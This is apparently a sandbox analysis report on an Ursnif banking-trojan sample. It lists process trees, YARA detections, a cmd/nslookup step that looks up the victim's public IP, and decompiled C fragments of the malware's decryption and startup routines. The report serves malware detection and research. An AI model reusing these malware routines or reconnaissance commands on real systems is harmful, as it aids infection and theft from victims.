                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

                                                          General

                                                          Start time:01:33:07
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 5008 Parent PID: 3424

                                                          General

                                                          Start time:01:33:19
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 5336 Parent PID: 5008

                                                          General

                                                          Start time:01:33:22
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: nslookup.exe PID: 1424 Parent PID: 5008

                                                          General

                                                          Start time:01:33:23
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\nslookup.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                          Imagebase:0x7ff73b890000
                                                          File size:86528 bytes
                                                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 3512 Parent PID: 3424

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: rundll32.exe PID: 6508 Parent PID: 4868

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff66d750000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Analysis Process: RuntimeBroker.exe PID: 4268 Parent PID: 3424

                                                          General

                                                          Start time:01:33:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 612 Parent PID: 3512

                                                          General

                                                          Start time:01:33:38
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Chronological Activities

                                                          Analysis Process: RuntimeBroker.exe PID: 4772 Parent PID: 3424

                                                          General

                                                          Start time:01:33:54
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 1260 Parent PID: 3424

                                                          General

                                                          Start time:01:34:00
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security

                                                          Chronological Activities

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Analysis Process: loaddll32.exe PID: 6856 Parent PID: 6416 loaddll32.exeCOMMON

                                                            Executed Functions

                                                            Function 04567FDD, Relevance: 39.3, APIs: 26, Instructions: 336memorylibrarynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlInitializeCriticalSection.NTDLL(0458C328), ref: 04567FFB
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memset.NTDLL ref: 0456802C
                                                            • RtlInitializeCriticalSection.NTDLL(049BB148), ref: 0456803D
                                                              • Part of subcall function 0456D464: RtlInitializeCriticalSection.NTDLL(0458C300), ref: 0456D488
                                                              • Part of subcall function 0456D464: RtlInitializeCriticalSection.NTDLL(0458C2E0), ref: 0456D49E
                                                              • Part of subcall function 0456D464: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0456D4AF
                                                              • Part of subcall function 0456D464: GetModuleHandleA.KERNEL32(0000170B), ref: 0456D4E3
                                                              • Part of subcall function 04583D51: RtlAllocateHeap.NTDLL(00000000,-00000003,77109EB0), ref: 04583D6B
                                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 04568066
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 04568077
                                                            • CloseHandle.KERNEL32(0000045C), ref: 0456808B
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 045680D4
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 045680E7
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 045680FC
                                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0456812C
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04568141
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0456814B
                                                            • CloseHandle.KERNEL32(00000000), ref: 04568158
                                                            • GetShellWindow.USER32 ref: 04568173
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0456817A
                                                            • memcpy.NTDLL(0458C1E4,?,00000018), ref: 045681B6
                                                            • CreateEventA.KERNEL32(0458C1A8,00000001,00000000,00000000,?,00000001), ref: 04568239
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04568263
                                                            • OpenEventA.KERNEL32(00100000,00000000,049BA9E0), ref: 0456828B
                                                            • CreateEventA.KERNEL32(0458C1A8,00000001,00000000,049BA9E0), ref: 0456829E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 045682A4
                                                            • GetLastError.KERNEL32(04574A5B,0458C0FC,0458C100), ref: 0456832A
                                                            • LoadLibraryA.KERNEL32(?,04574A5B,0458C0FC,0458C100), ref: 04568345
                                                            • SetEvent.KERNEL32(?,0456D17E,00000000,00000000), ref: 045683DA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000052,0456D17E), ref: 045683EF
                                                            • wsprintfA.USER32 ref: 0456841F
                                                              • Part of subcall function 0457DB4F: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,045683BB,0456D17E,00000000,00000000), ref: 0457DBC5
                                                              • Part of subcall function 0458398C: HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,045683C0,0456D17E,00000000,00000000), ref: 045839FD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                            • String ID:
                                                            • API String ID: 2659885799-0
                                                            • Opcode ID: 8cd23f3b3fcca42f47c8d58e364050faf6c4e5b95acf05fa2f625d94510a17df
                                                            • Instruction ID: a6e30004766e61b23917b23ac55a2b3d6a50f728de08cb96ea99387eded0ffaf
                                                            • Opcode Fuzzy Hash: 8cd23f3b3fcca42f47c8d58e364050faf6c4e5b95acf05fa2f625d94510a17df
                                                            • Instruction Fuzzy Hash: 17C1BC70601305DFD721AF65E884A2A7BE8FB84755B00582EF546E3240DF79B848FF66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD3FAB, Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E00DD3FAB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xdda0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xdda0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00DD77D7(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xdda0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00DD77EC(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                                            0x00dd3fb4
                                                            0x00dd3fba
                                                            0x00dd3fbd
                                                            0x00dd3fc3
                                                            0x00dd3fc3
                                                            0x00dd3fc5
                                                            0x00dd3fc7
                                                            0x00dd3fca
                                                            0x00dd3fd0
                                                            0x00dd3fd1
                                                            0x00dd3fd2
                                                            0x00dd3fd8
                                                            0x00dd3fdd
                                                            0x00dd3fe3
                                                            0x00dd3feb
                                                            0x00dd4148
                                                            0x00dd3ff1
                                                            0x00dd3ff3
                                                            0x00dd3ffc
                                                            0x00dd4001
                                                            0x00dd4013
                                                            0x00dd4016
                                                            0x00dd401a
                                                            0x00dd4021
                                                            0x00dd4025
                                                            0x00dd402d
                                                            0x00dd4133
                                                            0x00dd4033
                                                            0x00dd4033
                                                            0x00dd4037
                                                            0x00dd4038
                                                            0x00dd403a
                                                            0x00dd4045
                                                            0x00dd411f
                                                            0x00dd404b
                                                            0x00dd404b
                                                            0x00dd404e
                                                            0x00dd4054
                                                            0x00dd405a
                                                            0x00dd405a
                                                            0x00dd4062
                                                            0x00dd4066
                                                            0x00dd4069
                                                            0x00dd4110
                                                            0x00dd406f
                                                            0x00dd4075
                                                            0x00dd4078
                                                            0x00dd407b
                                                            0x00dd407d
                                                            0x00dd4080
                                                            0x00dd4083
                                                            0x00dd4085
                                                            0x00dd4085
                                                            0x00dd408f
                                                            0x00dd4094
                                                            0x00dd4097
                                                            0x00dd409a
                                                            0x00dd409c
                                                            0x00dd40a5
                                                            0x00dd40cf
                                                            0x00dd40a7
                                                            0x00dd40b8
                                                            0x00dd40b8
                                                            0x00dd40d7
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd40d9
                                                            0x00dd40dc
                                                            0x00dd40df
                                                            0x00dd40e3
                                                            0x00000000
                                                            0x00dd40e5
                                                            0x00dd40f4
                                                            0x00dd40fa
                                                            0x00dd4102
                                                            0x00dd4102
                                                            0x00000000
                                                            0x00dd40e3
                                                            0x00dd40e7
                                                            0x00dd40ef
                                                            0x00dd40f2
                                                            0x00dd4109
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd40f2
                                                            0x00dd4069
                                                            0x00dd4122
                                                            0x00dd4125
                                                            0x00dd4125
                                                            0x00dd413a
                                                            0x00dd413a
                                                            0x00dd4152

                                                            APIs
                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00DD48AF,00000001,00DD72E3,00000000), ref: 00DD3FE3
                                                            • memcpy.NTDLL(00DD48AF,00DD72E3,00000010,?,?,?,00DD48AF,00000001,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000), ref: 00DD3FFC
                                                            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00DD4025
                                                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00DD403D
                                                            • memcpy.NTDLL(00000000,00000000,039C9630,00000010), ref: 00DD408F
                                                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,039C9630,00000020,?,?,00000010), ref: 00DD40B8
                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,039C9630,?,?,00000010), ref: 00DD40CF
                                                            • GetLastError.KERNEL32(?,?,00000010), ref: 00DD40E7
                                                            • GetLastError.KERNEL32 ref: 00DD4119
                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 00DD4125
                                                            • GetLastError.KERNEL32 ref: 00DD412D
                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DD413A
                                                            • GetLastError.KERNEL32(?,?,?,00DD48AF,00000001,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD4142
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                            • String ID:
                                                            • API String ID: 1967744295-0
                                                            • Opcode ID: c3711c63ae216681105edf1eab16d9b3090d08571ce97db36212a133f81a38a2
                                                            • Instruction ID: 1e37fc809bff89b858f3ca5370a58e57faa30ae0635f3008a2f5f6cf7bc80eed
                                                            • Opcode Fuzzy Hash: c3711c63ae216681105edf1eab16d9b3090d08571ce97db36212a133f81a38a2
                                                            • Instruction Fuzzy Hash: CD5149B1900208FFDF10DFA9DC89AAEBBB9EB04350F14842AF915E6250E7719E54DB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1A1C, Relevance: 13.6, APIs: 9, Instructions: 107sleepnativesynchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E6E4B1A1C(intOrPtr _a4) {
				void _v316;
				signed int _v332;
				long _v344;
				long _v348;
				char _v356;
				char _v360;
				long _v364;
				long _v368;
				void* __edi;
				long _t25;
				long _t28;
				long _t31;
				long _t32;
				long _t36;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t49;
				long _t50;
				void* _t56;
				signed int _t59;
				signed int _t60;
				void* _t62;
				intOrPtr* _t63;

				_t25 = E6E4B1C6F();
				_v348 = _t25;
				if(_t25 != 0) {
					L18:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					_v344 = 0;
					_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed
					_t50 = _t28;
					_t59 = 0x13;
					_t11 = _t50 + 1; // 0x1
					_t60 = _v332 % _t59 + _t11;
					_t31 = E6E4B18A0(0, _t60); // executed
					_v368 = _t31;
					Sleep(_t60 << 4); // executed
					_t25 = _v368;
				} while (_t25 == 9);
				if(_t25 != 0) {
					goto L18;
				}
				_t32 = E6E4B1741(_t50); // executed
				_v364 = _t32;
				if(_t32 != 0) {
					L16:
					_t25 = _v364;
					if(_t25 == 0xffffffff) {
						_t25 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t62 = E6E4B1000(E6E4B1CDB,  &_v356);
					if(_t62 == 0) {
						_v368 = GetLastError();
					} else {
						_t36 = WaitForSingleObject(_t62, 0xffffffff);
						_v368 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t62,  &_v368); // executed
						}
						CloseHandle(_t62);
					}
					goto L16;
				}
				if(E6E4B1468(_t50,  &_v360) != 0) {
					 *0x6e4b41b8 = 0;
					goto L11;
				}
				_t49 = _v360;
				_t63 = __imp__GetLongPathNameW;
				_t42 =  *_t63(_t49, 0, 0); // executed
				_t56 = _t42;
				if(_t56 == 0) {
					L9:
					 *0x6e4b41b8 = _t49;
					goto L11;
				}
				_t19 = _t56 + 2; // 0x2
				_t44 = E6E4B2102(_t56 + _t19);
				 *0x6e4b41b8 = _t44;
				if(_t44 == 0) {
					goto L9;
				} else {
					 *_t63(_t49, _t44, _t56); // executed
					E6E4B2117(_t49);
					goto L11;
				}
			}


























                                                            0x6e4b1a2b
                                                            0x6e4b1a34
                                                            0x6e4b1a38
                                                            0x6e4b1b4c
                                                            0x6e4b1b52
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1a3e
                                                            0x6e4b1a3e
                                                            0x6e4b1a4f
                                                            0x6e4b1a53
                                                            0x6e4b1a59
                                                            0x6e4b1a61
                                                            0x6e4b1a66
                                                            0x6e4b1a66
                                                            0x6e4b1a6b
                                                            0x6e4b1a74
                                                            0x6e4b1a78
                                                            0x6e4b1a7e
                                                            0x6e4b1a82
                                                            0x6e4b1a89
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1a8f
                                                            0x6e4b1a96
                                                            0x6e4b1a9a
                                                            0x6e4b1b3d
                                                            0x6e4b1b3d
                                                            0x6e4b1b44
                                                            0x6e4b1b46
                                                            0x6e4b1b46
                                                            0x00000000
                                                            0x6e4b1b44
                                                            0x6e4b1aa3
                                                            0x6e4b1af6
                                                            0x6e4b1af6
                                                            0x6e4b1b07
                                                            0x6e4b1b0b
                                                            0x6e4b1b39
                                                            0x6e4b1b0d
                                                            0x6e4b1b10
                                                            0x6e4b1b18
                                                            0x6e4b1b1c
                                                            0x6e4b1b24
                                                            0x6e4b1b24
                                                            0x6e4b1b2b
                                                            0x6e4b1b2b
                                                            0x00000000
                                                            0x6e4b1b0b
                                                            0x6e4b1ab1
                                                            0x6e4b1af0
                                                            0x00000000
                                                            0x6e4b1af0
                                                            0x6e4b1ab3
                                                            0x6e4b1ab7
                                                            0x6e4b1ac0
                                                            0x6e4b1ac2
                                                            0x6e4b1ac6
                                                            0x6e4b1ae8
                                                            0x6e4b1ae8
                                                            0x00000000
                                                            0x6e4b1ae8
                                                            0x6e4b1ac8
                                                            0x6e4b1acd
                                                            0x6e4b1ad4
                                                            0x6e4b1ad9
                                                            0x00000000
                                                            0x6e4b1adb
                                                            0x6e4b1ade
                                                            0x6e4b1ae1
                                                            0x00000000
                                                            0x6e4b1ae1

                                                            APIs
